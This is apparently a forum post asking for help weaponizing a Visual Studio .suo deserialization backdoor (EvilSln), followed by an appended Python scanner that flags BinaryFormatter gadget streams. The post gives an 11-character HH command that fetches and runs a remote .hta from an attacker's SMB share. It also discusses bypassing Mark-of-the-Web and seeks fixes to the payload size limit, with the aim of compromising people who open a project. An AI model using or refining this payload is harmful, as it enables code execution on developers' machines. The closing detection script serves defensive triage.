Recently I saw an interesting article and POC on GitHub about backdooring Visual Studio projects (https://github.com/cjm00n/EvilSln).
I liked it because there are no build events or other classical techniques that can be spotted by reading the .sln.
I will not re-explain all the details of the vulns here; feel free to read the article.
A friend and I analyzed the POC and the package's code and figured out that BinaryFormatter is being used, with TypeConfuseDelegate as the gadget.
We are able to take the stream from the .suo's VsToolboxService, keeping the existing buggy byte headers, and replace the serialized object with ours, and it executes, but only if the size of the payload is exactly the same as the original one.
For example, "cmd /c calc" is the command wrapped in the original payload; "taskmgr.exe" is also 11 chars and works too, but taskmgr alone doesn't work. We tried a lot of payloads and the only way to RCE we found in 11 chars is:
HH \\qw.p\x
qw.p being a public SMB share and x being a valid .hta file containing a longer payload.
The issue with this technique is that 3-char-long domains are expensive, so I thought about https://handshake.org/, which makes it possible to buy an xx.p domain for $33.
So my first two questions are:
Are Handshake domains compatible with the HH Windows command to resolve the SMB address?
There is still a huge issue with this first technique: the deserialisation allows bypassing MOTW, so invoking a remote payload with HH will make me lose this advantage. It is bad.
I tried hard to understand the size limitation issue; I think I don't understand something with the stream's headers maybe. This is my main problem / question: can someone help me to understand this length limitation?
I am also working on a way to pack the .hta without extension somewhere in the project directories and invoke it in 11 chars, but I don't like the idea of having the payload somewhere other than the .suo itself.
Contact me in private if you want to use Matrix or XMPP to talk faster.
I totally understand that some people will have the solution but will fix it and keep it private. In this case rep+ for the idea and reproduction instructions.
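For anyone on the defensive side of this (triaging a repository before opening it in Visual Studio, or hunting for tampered .suo files), here is an added example that is not part of the post or the EvilSln project: a small Python heuristic that flags files containing an MS-NRBF (BinaryFormatter) serialization header together with type names that the TypeConfuseDelegate chain relies on. The header pattern follows the MS-NRBF SerializationHeaderRecord layout; the list of indicator type names is my assumption about what that chain serializes, and the sample bytes are constructed for the demo, not a real gadget.

```python
"""Heuristic triage for Visual Studio .suo files (or any binary blob): flag
BinaryFormatter (MS-NRBF) streams that also carry type names typical of the
TypeConfuseDelegate gadget chain. A hit is a reason to look closer, not proof."""
import re
import sys
from pathlib import Path

# OLE2 compound-file magic; .suo files are compound documents with named streams.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# MS-NRBF SerializationHeaderRecord: RecordTypeEnum 0x00, RootId (4 bytes),
# HeaderId (4 bytes), MajorVersion = 1, MinorVersion = 0.
NRBF_HEADER = re.compile(rb"\x00.{8}\x01\x00\x00\x00\x00\x00\x00\x00", re.DOTALL)

# Assumed indicators: type names serialized by the TypeConfuseDelegate chain
# (a SortedSet whose comparer wraps a delegate to Process.Start). Heuristic only.
GADGET_INDICATORS = (
    b"System.DelegateSerializationHolder",
    b"System.Collections.Generic.ComparisonComparer",
    b"System.Collections.Generic.SortedSet",
    b"System.Diagnostics.Process",
)


def scan_bytes(data: bytes) -> dict:
    """Return what was found; 'suspicious' needs an NRBF header plus 2+ indicators."""
    indicators = [name.decode() for name in GADGET_INDICATORS if name in data]
    headers = len(NRBF_HEADER.findall(data))
    return {
        "is_ole": data.startswith(OLE_MAGIC),
        "nrbf_headers": headers,
        "indicators": indicators,
        "suspicious": headers > 0 and len(indicators) >= 2,
    }


def scan_file(path) -> dict:
    return scan_bytes(Path(path).read_bytes())


def _lps(s: str) -> bytes:
    """Encode an MS-NRBF LengthPrefixedString: 7-bit variable-length size, then UTF-8."""
    raw = s.encode("utf-8")
    n = len(raw)
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out) + raw


# Constructed sample: a bare NRBF header followed by the gadget-chain type names.
# These are only the byte patterns the scanner keys on, not a working gadget.
SAMPLE_SUSPICIOUS = (
    b"\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00"
    + _lps("System.Collections.Generic.SortedSet`1[[System.String]]")
    + _lps("System.Collections.Generic.ComparisonComparer`1[[System.String]]")
    + _lps("System.DelegateSerializationHolder")
    + _lps("System.Diagnostics.Process")
)
# Constructed benign sample: OLE magic and a stream name, no serialized payload.
SAMPLE_BENIGN = OLE_MAGIC + b"\x00" * 64 + b"VsToolboxService" + b"\x00" * 64

if __name__ == "__main__":
    for p in sys.argv[1:]:
        print(p, scan_file(p))
```

Because a .suo is an OLE compound document, a stream can be split across non-contiguous sectors, so a raw byte scan like this can miss a type name that straddles a sector boundary; for a thorough check, extract the VsToolboxService stream with an OLE parser (for example the olefile package) and run scan_bytes on the reassembled stream. Pair the result with a policy decision: .suo files are per-user state and have no business in a repository, so one arriving in a clone is itself worth questioning.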